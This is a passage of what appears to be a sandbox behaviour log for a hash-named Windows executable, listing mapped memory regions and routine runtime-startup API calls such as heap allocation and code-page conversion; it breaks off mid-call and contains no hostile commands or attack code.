"\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 915 start_va = 0x1ee0000 end_va = 0x1ee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 916 start_va = 0x3040000 end_va = 0x3140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 917 start_va = 0x3040000 end_va = 0x3140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 918 start_va = 0x3040000 end_va = 0x3140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 919 start_va = 0x6f0000 end_va = 0x6f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 920 start_va = 0x2770000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 921 start_va = 0x1ef0000 end_va = 0x1ef3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 922 start_va = 0x3040000 end_va = 0x30a5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 923 start_va = 0x2710000 end_va = 0x271dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 924 start_va = 0x759d0000 end_va = 0x75b6cfff monitored = 0 entry_point = 0x759d17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 925 start_va = 0x758a0000 end_va = 0x758c6fff monitored = 0 entry_point = 0x758a58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 926 start_va = 0x75b70000 end_va = 0x75b81fff monitored = 0 entry_point = 0x75b71441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 927 start_va = 0x2720000 end_va = 0x272cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Thread: id = 2 os_tid = 0xeec [0080.729] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x92d92c80, dwHighDateTime=0x1d8a8b9)) [0080.729] GetCurrentThreadId () returned 0xeec [0080.729] GetCurrentProcessId () returned 0xee8 [0080.729] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1520592999823) returned 1 [0080.770] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x76f1fd35, hStdError=0x76f87daf)) [0080.805] GetProcessHeap () returned 0x700000 [0080.922] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0080.922] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0080.922] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0080.922] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0080.922] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0080.922] GetProcAddress (hModule=0x752b0000, lpProcName="InitializeCriticalSectionEx") returned 0x752c4ce0 [0080.922] GetProcAddress (hModule=0x752b0000, lpProcName="CreateEventExW") returned 0x753446ab [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSemaphoreExW") returned 0x75344735 [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadStackGuarantee") returned 0x752cd2d7 [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolTimer") returned 0x752dee4e [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolTimer") returned 0x76f4441c [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x76f6c50e [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolTimer") returned 0x76f6c381 [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolWait") returned 0x752df058 [0080.923] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolWait") returned 0x76f505d7 [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolWait") returned 0x76f6ca24 [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="FlushProcessWriteBuffers") returned 0x76f20b8c [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x76fdfde8 [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentProcessorNumber") returned 0x76f71e1d [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="GetLogicalProcessorInformation") returned 0x75344d01 [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSymbolicLinkW") returned 0x7533d181 [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="SetDefaultDllDirectories") returned 0x753d208a [0080.924] GetProcAddress (hModule=0x752b0000, lpProcName="EnumSystemLocalesEx") returned 0x753447ef [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="CompareStringEx") returned 0x75344c51 [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="GetDateFormatEx") returned 0x75356c26 [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="GetLocaleInfoEx") returned 0x75344cf1 [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="GetTimeFormatEx") returned 0x75356ba1 [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="GetUserDefaultLocaleName") returned 0x75344d61 [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="IsValidLocaleName") returned 0x75344d81 [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="LCMapStringEx") returned 0x75344d91 [0080.925] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0080.926] GetProcAddress (hModule=0x752b0000, lpProcName="GetTickCount64") returned 0x752deeb0 [0080.926] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0080.926] GetProcAddress (hModule=0x752b0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0080.926] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3bc) returned 0x71f1c8 [0080.927] GetCurrentThreadId () returned 0xeec [0080.954] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x18) returned 0x7119a0 [0080.954] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x800) returned 0x71f590 [0080.954] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x9966506c, hStdError=0x0)) [0080.954] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.954] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0080.954] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.954] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " [0080.954] GetEnvironmentStringsW () returned 0x71fd98* [0080.955] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xb0e) returned 0x7208b0 [0080.983] FreeEnvironmentStringsW (penv=0x71fd98) returned 1 [0081.019] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0xc8) returned 0x71fd98 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x98) returned 0x71fe68 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3e) returned 0x7123e8 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x56) returned 0x71ff08 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x6e) returned 0x71ff68 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x78) returned 0x70fb38 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x62) returned 0x71ffe0 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x30) returned 0x71b278 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x48) returned 0x716d90 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x28) returned 0x71ac70 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1a) returned 0x71ea80 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x34) returned 0x7119c0 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x5c) returned 0x720050 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x32) returned 0x7200b8 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2e) returned 0x71b2b0 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1c) returned 0x71eaa8 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x12a) returned 0x7200f8 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x7c) returned 0x720230 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x36) returned 0x7202b8 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3a) returned 0x712430 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x90) returned 0x7202f8 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x24) returned 0x71aca0 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x30) returned 0x71b2e8 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x36) returned 0x720390 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x48) returned 0x716de0 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x52) returned 0x7203d0 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3c) returned 0x712478 [0081.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xd6) returned 0x720430 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2e) returned 0x71b320 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x1e) returned 0x71ead0 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2c) returned 0x71b358 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x54) returned 0x720510 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x52) returned 0x720570 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2c) returned 0x71b390 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x26) returned 0x71acd0 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x3e) returned 0x7124c0 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x24) returned 0x71ad00 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x30) returned 0x71b3c8 [0081.021] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x8c) returned 0x7205d0 [0081.021] HeapFree (in: hHeap=0x700000, dwFlags=0x0, lpMem=0x7208b0 | out: hHeap=0x700000) returned 1 [0081.102] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x800) returned 0x720668 [0081.129] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x80) returned 0x720e70 [0081.129] GetLastError () returned 0x0 [0081.130] SetLastError (dwErrCode=0x0) [0081.130] GetLastError () returned 0x0 [0081.130] SetLastError (dwErrCode=0x0) [0081.130] GetLastError () returned 0x0 [0081.130] SetLastError (dwErrCode=0x0) [0081.130] GetACP () returned 0x4e4 [0081.130] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x220) returned 0x720ef8 [0081.130] GetLastError () returned 0x0 [0081.130] SetLastError (dwErrCode=0x0) [0081.130] IsValidCodePage (CodePage=0x4e4) returned 1 [0081.130] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0081.154] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0081.162] GetLastError () returned 0x0 [0081.162] SetLastError (dwErrCode=0x0) [0081.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.174] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0081.174] GetLastError () returned 0x0 [0081.174] SetLastError (dwErrCode=0x0) [0081.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.182] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0081.183] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0081.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿüQf\x99äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0081.183] GetLastError () returned 0x0 [0081.183] SetLastError (dwErrCode=0x0) [0081.183] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0081.183] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0081.183] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0081.183] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0081.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 